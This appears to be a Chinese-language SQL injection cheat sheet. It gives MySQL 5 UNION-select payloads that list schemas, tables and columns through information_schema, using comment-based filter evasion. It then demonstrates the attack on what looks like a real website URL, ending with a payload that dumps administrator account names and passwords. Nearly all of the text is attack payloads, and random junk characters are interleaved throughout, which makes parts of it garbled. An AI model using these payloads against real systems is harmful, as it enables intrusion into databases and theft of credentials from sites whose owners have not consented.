查库! J( x6 K4 G: W4 U: X e
9 V* f* U# I M( Eid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
# _1 m6 k0 o' [* H. |$ k+ J8 G# M
查表
( S8 D$ D& v4 C+ c7 ]1 W: d4 C. j, O2 O: j% V# F1 u
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,19 U% k# u" }) E9 T
7 N3 m! R7 x9 k
查段6 x* R X2 a8 `- \8 D
- n0 {& f( n$ o( |* p1 uid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
% v& Z6 ?- H! a/ ~7 n* s
" w" [/ B. I$ ?) {; `( v
1 b# l7 O) y/ H4 v7 p+ m; ?mysql5高级注入方法暴表
+ ?5 U" o; x# n% g% r9 K# s
$ [( T% w% @! w例子如下:
% a g: D2 h" u9 e3 Z; G( s5 ]/ I3 ]' V$ P. G$ M
1.爆表
" l- h2 m* t( S" ?' X2 H" L8 \) whttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)3 G8 N1 x2 U. J/ O2 X t
这样爆到第4个时出现了admin_user表。
2 a. \9 Y8 z1 O! p* L* V. O0 E. X5 O2 D1 u. f. U3 N& O
2.暴字段
! F1 N/ V! k0 h z( z6 ahttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
$ w8 Z6 \- C4 X' {- w8 ?* Q+ @& L/ E* G z ~
: b6 n% e7 {8 N6 j o7 T* K9 L) G5 B
3.爆密码4 W4 E$ M5 k$ a: ^5 z" L& y5 ~
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
: L0 G- Y6 e% S6 w
/ C3 F' K- I+ t! P4 u7 L9 {
- h7 g- b0 N$ ?% q. L1 v |